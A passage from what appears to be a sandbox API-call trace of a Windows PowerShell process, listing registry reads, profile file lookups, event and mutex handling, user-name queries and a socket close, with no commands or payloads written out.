returned 0x0 [0079.707] GetLastError () returned 0xcb [0080.392] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2c6668 [0080.393] GetLastError () returned 0x0 [0080.395] LocalAlloc (uFlags=0x0, uBytes=0x80) returned 0x2c65e0 [0080.396] GetLastError () returned 0x0 [0080.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.850] GetLastError () returned 0xcb [0080.850] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.850] GetLastError () returned 0xcb [0080.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.851] GetLastError () returned 0xcb [0080.851] VirtualQuery (in: lpAddress=0xcce68, lpBuffer=0xcde68, dwLength=0x1c | out: lpBuffer=0xcde68*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd93c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.856] GetLastError () returned 0xcb [0080.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.856] GetLastError () returned 0xcb [0080.856] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd8ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0080.856] GetLastError () returned 0xcb [0080.856] VirtualQuery (in: lpAddress=0xcce60, lpBuffer=0xcde60, dwLength=0x1c | out: lpBuffer=0xcde60*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.857] VirtualQuery (in: lpAddress=0xccb14, lpBuffer=0xcdb14, dwLength=0x1c | out: lpBuffer=0xcdb14*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.857] VirtualQuery (in: lpAddress=0xccb14, lpBuffer=0xcdb14, dwLength=0x1c | out: lpBuffer=0xcdb14*(BaseAddress=0xcc000, AllocationBase=0x90000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0080.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce59c | out: phkResult=0xce59c*=0x3c0) returned 0x0 [0080.862] RegQueryValueExW (in: hKey=0x3c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce5e4, lpData=0x0, lpcbData=0xce5e0*=0x0 | out: lpType=0xce5e4*=0x1, lpData=0x0, lpcbData=0xce5e0*=0x56) returned 0x0 [0080.862] RegQueryValueExW (in: hKey=0x3c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce5e4, lpData=0x2d1690, lpcbData=0xce5e0*=0x56 | out: lpType=0xce5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce5e0*=0x56) returned 0x0 [0080.862] RegCloseKey (hKey=0x3c0) returned 0x0 [0080.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xce59c | out: phkResult=0xce59c*=0x3c0) returned 0x0 [0080.863] RegQueryValueExW (in: hKey=0x3c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce5e4, lpData=0x0, lpcbData=0xce5e0*=0x0 | out: lpType=0xce5e4*=0x1, lpData=0x0, lpcbData=0xce5e0*=0x56) returned 0x0 [0080.863] RegQueryValueExW (in: hKey=0x3c0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xce5e4, lpData=0x2d1690, lpcbData=0xce5e0*=0x56 | out: lpType=0xce5e4*=0x1, lpData="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0", lpcbData=0xce5e0*=0x56) returned 0x0 [0080.863] RegCloseKey (hKey=0x3c0) returned 0x0 [0080.864] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2d1690 | out: pszPath="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents") returned 0x0 [0080.864] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", lpFilePart=0x0) returned 0x24 [0080.864] GetLastError () returned 0x3f0 [0080.864] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x2d1690 | out: pszPath="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents") returned 0x0 [0080.865] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", nBufferLength=0x105, lpBuffer=0xce134, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents", lpFilePart=0x0) returned 0x24 [0080.865] GetLastError () returned 0x3f0 [0080.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0xce1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36 [0080.867] GetLastError () returned 0x3f0 [0080.867] SetErrorMode (uMode=0x1) returned 0x1 [0080.867] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\profile.ps1", fInfoLevelId=0x0, lpFileInformation=0xce64c | out: lpFileInformation=0xce64c) returned 0 [0080.867] GetLastError () returned 0x2 [0080.867] SetErrorMode (uMode=0x1) returned 0x1 [0080.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xce1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b [0080.867] GetLastError () returned 0x2 [0080.867] SetErrorMode (uMode=0x1) returned 0x1 [0080.868] GetFileAttributesExW (in: lpFileName="C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", fInfoLevelId=0x0, lpFileInformation=0xce64c | out: lpFileInformation=0xce64c) returned 0 [0080.868] GetLastError () returned 0x2 [0080.868] SetErrorMode (uMode=0x1) returned 0x1 [0080.868] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0xce1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x42 [0080.868] GetLastError () returned 0x2 [0080.868] SetErrorMode (uMode=0x1) returned 0x1 [0080.868] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\profile.ps1", fInfoLevelId=0x0, lpFileInformation=0xce64c | out: lpFileInformation=0xce64c) returned 0 [0080.868] GetLastError () returned 0x3 [0080.868] SetErrorMode (uMode=0x1) returned 0x1 [0080.869] GetFullPathNameW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0xce1cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x57 [0080.869] GetLastError () returned 0x3 [0080.869] SetErrorMode (uMode=0x1) returned 0x1 [0080.869] GetFileAttributesExW (in: lpFileName="C:\\Users\\hJrD1KOKY DS8lUjv\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", fInfoLevelId=0x0, lpFileInformation=0xce64c | out: lpFileInformation=0xce64c) returned 0 [0080.869] GetLastError () returned 0x3 [0080.869] SetErrorMode (uMode=0x1) returned 0x1 [0080.871] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.871] GetLastError () returned 0xcb [0080.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.874] GetLastError () returned 0xcb [0080.878] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.878] GetLastError () returned 0xcb [0080.880] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.880] GetLastError () returned 0xcb [0080.882] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.882] GetLastError () returned 0xcb [0080.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.892] GetLastError () returned 0xcb [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3c0 [0080.893] GetLastError () returned 0x0 [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3c4 [0080.893] GetLastError () returned 0x0 [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3c8 [0080.893] GetLastError () returned 0x0 [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3cc [0080.893] GetLastError () returned 0x0 [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3d0 [0080.893] GetLastError () returned 0x0 [0080.893] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3d4 [0080.893] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3d8 [0080.894] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3dc [0080.894] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x3e0 [0080.894] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x3e4 [0080.894] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3e8 [0080.894] GetLastError () returned 0x0 [0080.894] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3ec [0080.894] GetLastError () returned 0x0 [0080.896] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.896] GetLastError () returned 0xcb [0080.906] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0080.906] GetLastError () returned 0xcb [0080.908] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xce68c | out: lpMode=0xce68c) returned 1 [0080.909] GetLastError () returned 0xcb [0080.912] SetEvent (hEvent=0x3cc) returned 1 [0080.912] GetLastError () returned 0xcb [0080.912] SetEvent (hEvent=0x3c0) returned 1 [0080.912] GetLastError () returned 0xcb [0080.912] SetEvent (hEvent=0x3c4) returned 1 [0080.912] GetLastError () returned 0xcb [0080.912] SetEvent (hEvent=0x3c8) returned 1 [0080.912] GetLastError () returned 0xcb [0080.912] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x3f0 [0080.912] GetLastError () returned 0x0 [0080.914] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0080.914] GetLastError () returned 0xcb [0080.916] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xce4f0 | out: phkResult=0xce4f0*=0x3f4) returned 0x0 [0080.918] RegQueryValueExW (in: hKey=0x3f4, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xce538, lpData=0x0, lpcbData=0xce534*=0x0 | out: lpType=0xce538*=0x0, lpData=0x0, lpcbData=0xce534*=0x0) returned 0x2 [0102.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x60c [0102.214] GetLastError () returned 0x0 [0102.214] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x610 [0102.215] GetLastError () returned 0x0 [0102.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x614 [0102.215] GetLastError () returned 0x0 [0102.215] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x600 [0102.215] GetLastError () returned 0x0 [0102.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5fc [0102.215] GetLastError () returned 0x0 [0102.215] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x5f4 [0102.216] GetLastError () returned 0x0 [0102.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x604 [0102.216] GetLastError () returned 0x0 [0102.216] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x608 [0102.216] GetLastError () returned 0x0 [0102.216] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x5f8 [0102.216] GetLastError () returned 0x0 [0102.217] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x618 [0102.217] GetLastError () returned 0x0 [0102.217] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x620 [0102.217] GetLastError () returned 0x0 [0102.217] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x624 [0102.217] GetLastError () returned 0x0 [0102.217] SetEvent (hEvent=0x600) returned 1 [0102.217] GetLastError () returned 0x0 [0102.217] SetEvent (hEvent=0x60c) returned 1 [0102.218] GetLastError () returned 0x0 [0102.218] SetEvent (hEvent=0x610) returned 1 [0102.218] GetLastError () returned 0x0 [0102.218] SetEvent (hEvent=0x614) returned 1 [0102.218] GetLastError () returned 0x0 [0102.218] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x628 [0102.218] GetLastError () returned 0x0 [0102.219] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0xce524 | out: phkResult=0xce524*=0x630) returned 0x0 [0102.220] RegQueryValueExW (in: hKey=0x630, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0xce56c, lpData=0x0, lpcbData=0xce568*=0x0 | out: lpType=0xce56c*=0x0, lpData=0x0, lpcbData=0xce568*=0x0) returned 0x2 [0102.394] SetEvent (hEvent=0x5fc) returned 1 [0102.394] GetLastError () returned 0x0 [0102.394] SetEvent (hEvent=0x5f4) returned 1 [0102.394] GetLastError () returned 0x0 [0102.394] SetEvent (hEvent=0x604) returned 1 [0102.394] GetLastError () returned 0x0 [0102.479] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x2d1690, nSize=0x80 | out: lpBuffer="") returned 0x0 [0102.479] GetLastError () returned 0xcb [0102.571] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2d1e50, nSize=0xce600 | out: lpNameBuffer="1R6PFH\\hJrD1KOKY DS8lUjv", nSize=0xce600) returned 0x1 [0102.571] GetLastError () returned 0xcb [0102.571] GetUserNameW (in: lpBuffer=0x2d1690, pcbBuffer=0xce608 | out: lpBuffer="hJrD1KOKY DS8lUjv", pcbBuffer=0xce608) returned 1 [0102.620] ReportEventW (hEventLog=0x4eb0004, wType=0x4, wCategory=0x4, dwEventID=0x193, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d36660*="Stopped", lpRawData=0x2d3651c) returned 1 [0102.664] GetLastError () returned 0x0 [0102.666] SetConsoleCtrlHandler (HandlerRoutine=0x0, Add=0) returned 1 [0102.666] GetLastError () returned 0x0 [0102.669] CoGetContextToken (in: pToken=0xcf330 | out: pToken=0xcf330) returned 0x0 [0102.669] IUnknown:QueryInterface (in: This=0x297f30, riid=0x66ab3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf364 | out: ppvObject=0xcf364*=0x297f3c) returned 0x0 [0102.670] IComThreadingInfo:GetCurrentThreadType (in: This=0x297f3c, pThreadType=0xcf3d4 | out: pThreadType=0xcf3d4*=0) returned 0x0 [0102.670] IUnknown:Release (This=0x297f3c) returned 0x1 [0102.672] CoGetContextToken (in: pToken=0xcf108 | out: pToken=0xcf108) returned 0x0 [0102.672] IUnknown:QueryInterface (in: This=0x297f30, riid=0x66ab3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf13c | out: ppvObject=0xcf13c*=0x297f3c) returned 0x0 [0102.673] IComThreadingInfo:GetCurrentThreadType (in: This=0x297f3c, pThreadType=0xcf170 | out: pThreadType=0xcf170*=0) returned 0x0 [0102.673] IUnknown:Release (This=0x297f3c) returned 0x1 [0102.691] CoGetContextToken (in: pToken=0xcf108 | out: pToken=0xcf108) returned 0x0 [0102.691] IUnknown:QueryInterface (in: This=0x297f30, riid=0x66ab3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf13c | out: ppvObject=0xcf13c*=0x297f3c) returned 0x0 [0102.691] IComThreadingInfo:GetCurrentThreadType (in: This=0x297f3c, pThreadType=0xcf170 | out: pThreadType=0xcf170*=0) returned 0x0 [0102.691] IUnknown:Release (This=0x297f3c) returned 0x1 [0102.714] CoGetContextToken (in: pToken=0xcf108 | out: pToken=0xcf108) returned 0x0 [0102.714] IUnknown:QueryInterface (in: This=0x297f30, riid=0x66ab3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf13c | out: ppvObject=0xcf13c*=0x297f3c) returned 0x0 [0102.715] IComThreadingInfo:GetCurrentThreadType (in: This=0x297f3c, pThreadType=0xcf170 | out: pThreadType=0xcf170*=0) returned 0x0 [0102.715] IUnknown:Release (This=0x297f3c) returned 0x1 [0102.810] CoGetContextToken (in: pToken=0xcf0e8 | out: pToken=0xcf0e8) returned 0x0 [0102.810] IUnknown:QueryInterface (in: This=0x297f30, riid=0x66ab3ff0*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0xcf11c | out: ppvObject=0xcf11c*=0x297f3c) returned 0x0 [0102.811] IComThreadingInfo:GetCurrentThreadType (in: This=0x297f3c, pThreadType=0xcf150 | out: pThreadType=0xcf150*=0) returned 0x0 [0102.811] IUnknown:Release (This=0x297f3c) returned 0x0 [0102.813] CoUninitialize () Thread: id = 24 os_tid = 0xab0 Thread: id = 25 os_tid = 0xab4 Thread: id = 26 os_tid = 0xab8 Thread: id = 28 os_tid = 0xad0 Thread: id = 29 os_tid = 0xad4 [0068.559] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0077.553] LocalFree (hMem=0x2a5150) returned 0x0 [0077.553] GetLastError () returned 0x0 [0077.553] CloseHandle (hObject=0x334) returned 1 [0077.553] GetLastError () returned 0x0 [0077.553] CloseHandle (hObject=0x13) returned 1 [0077.554] GetLastError () returned 0x0 [0077.554] CloseHandle (hObject=0xf) returned 1 [0077.554] GetLastError () returned 0x0 [0077.555] RegCloseKey (hKey=0x318) returned 0x0 [0077.555] RegCloseKey (hKey=0x314) returned 0x0 [0077.555] RegCloseKey (hKey=0x310) returned 0x0 [0077.555] LocalFree (hMem=0x2a51a0) returned 0x0 [0077.555] GetLastError () returned 0x0 [0077.555] RegCloseKey (hKey=0x340) returned 0x0 [0078.629] RegCloseKey (hKey=0x340) returned 0x0 [0081.392] RegCloseKey (hKey=0x390) returned 0x0 [0081.393] RegCloseKey (hKey=0x38c) returned 0x0 [0081.393] RegCloseKey (hKey=0x388) returned 0x0 [0081.394] RegCloseKey (hKey=0x384) returned 0x0 [0081.394] RegCloseKey (hKey=0x380) returned 0x0 [0081.394] RegCloseKey (hKey=0x37c) returned 0x0 [0081.395] RegCloseKey (hKey=0x314) returned 0x0 [0081.395] RegCloseKey (hKey=0x3a8) returned 0x0 [0081.396] RegCloseKey (hKey=0x374) returned 0x0 [0081.396] RegCloseKey (hKey=0x370) returned 0x0 [0081.397] RegCloseKey (hKey=0x36c) returned 0x0 [0081.397] RegCloseKey (hKey=0x368) returned 0x0 [0081.397] RegCloseKey (hKey=0x364) returned 0x0 [0081.398] RegCloseKey (hKey=0x360) returned 0x0 [0081.398] RegCloseKey (hKey=0x35c) returned 0x0 [0081.399] RegCloseKey (hKey=0x3a4) returned 0x0 [0081.399] RegCloseKey (hKey=0x354) returned 0x0 [0081.400] RegCloseKey (hKey=0x350) returned 0x0 [0081.400] RegCloseKey (hKey=0x34c) returned 0x0 [0081.400] RegCloseKey (hKey=0x348) returned 0x0 [0081.401] RegCloseKey (hKey=0x344) returned 0x0 [0081.401] RegCloseKey (hKey=0x334) returned 0x0 [0081.402] RegCloseKey (hKey=0x318) returned 0x0 [0081.402] RegCloseKey (hKey=0x3a0) returned 0x0 [0081.402] RegCloseKey (hKey=0x310) returned 0x0 [0081.402] RegCloseKey (hKey=0x340) returned 0x0 [0081.403] RegCloseKey (hKey=0x39c) returned 0x0 [0081.403] RegCloseKey (hKey=0x398) returned 0x0 [0081.404] RegCloseKey (hKey=0x378) returned 0x0 [0081.404] RegCloseKey (hKey=0x3f4) returned 0x0 [0081.404] RegCloseKey (hKey=0x3ac) returned 0x0 [0102.676] GetLastError () returned 0x0 [0102.676] GetLastError () returned 0x0 [0102.676] LocalFree (hMem=0x2c65e0) returned 0x0 [0102.676] GetLastError () returned 0x0 [0102.677] GetLastError () returned 0x0 [0102.677] GetLastError () returned 0x0 [0102.677] LocalFree (hMem=0x2c6668) returned 0x0 [0102.677] GetLastError () returned 0x0 [0102.678] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2d3688c, cbSid=0x260f2d8 | out: pSid=0x2d3688c, cbSid=0x260f2d8) returned 1 [0102.678] GetLastError () returned 0x0 [0102.679] CreateMutexW (lpMutexAttributes=0x2d3699c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4 [0102.679] GetLastError () returned 0x0 [0102.680] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0 [0102.680] GetLastError () returned 0x0 [0102.680] ReleaseMutex (hMutex=0x3f4) returned 1 [0102.680] GetLastError () returned 0x0 [0102.680] CloseHandle (hObject=0x3f4) returned 1 [0102.680] GetLastError () returned 0x0 [0102.681] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2d36ba8, cbSid=0x260f2d8 | out: pSid=0x2d36ba8, cbSid=0x260f2d8) returned 1 [0102.681] GetLastError () returned 0x0 [0102.681] CreateMutexW (lpMutexAttributes=0x2d36cb8, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4 [0102.682] GetLastError () returned 0x0 [0102.682] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0 [0102.682] GetLastError () returned 0x0 [0102.682] ReleaseMutex (hMutex=0x3f4) returned 1 [0102.682] GetLastError () returned 0x0 [0102.682] CloseHandle (hObject=0x3f4) returned 1 [0102.683] GetLastError () returned 0x0 [0102.683] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2d36ec4, cbSid=0x260f2d8 | out: pSid=0x2d36ec4, cbSid=0x260f2d8) returned 1 [0102.683] GetLastError () returned 0x0 [0102.684] CreateMutexW (lpMutexAttributes=0x2d36fd4, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4 [0102.684] GetLastError () returned 0x0 [0102.684] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0 [0102.684] GetLastError () returned 0x0 [0102.684] ReleaseMutex (hMutex=0x3f4) returned 1 [0102.684] GetLastError () returned 0x0 [0102.685] CloseHandle (hObject=0x3f4) returned 1 [0102.685] GetLastError () returned 0x0 [0102.685] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2d371e0, cbSid=0x260f2d8 | out: pSid=0x2d371e0, cbSid=0x260f2d8) returned 1 [0102.685] GetLastError () returned 0x0 [0102.686] CreateMutexW (lpMutexAttributes=0x2d372f0, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4 [0102.686] GetLastError () returned 0x0 [0102.686] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0 [0102.686] GetLastError () returned 0x0 [0102.686] ReleaseMutex (hMutex=0x3f4) returned 1 [0102.686] GetLastError () returned 0x0 [0102.687] CloseHandle (hObject=0x3f4) returned 1 [0102.687] GetLastError () returned 0x0 [0102.687] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2d374fc, cbSid=0x260f2d8 | out: pSid=0x2d374fc, cbSid=0x260f2d8) returned 1 [0102.687] GetLastError () returned 0x0 [0102.688] CreateMutexW (lpMutexAttributes=0x2d3760c, bInitialOwner=0, lpName="Global\\.net clr networking") returned 0x3f4 [0102.688] GetLastError () returned 0x0 [0102.688] WaitForSingleObject (hHandle=0x3f4, dwMilliseconds=0x1f4) returned 0x0 [0102.688] GetLastError () returned 0x0 [0102.688] ReleaseMutex (hMutex=0x3f4) returned 1 [0102.688] GetLastError () returned 0x0 [0102.689] CloseHandle (hObject=0x3f4) returned 1 [0102.689] GetLastError () returned 0x0 [0102.699] setsockopt (s=0x58c, level=65535, optname=128, optval="\x01", optlen=4) returned 0 [0102.699] GetLastError () returned 0x0 [0102.699] closesocket (s=0x58c) returned 0 [0102.700] GetLastError () 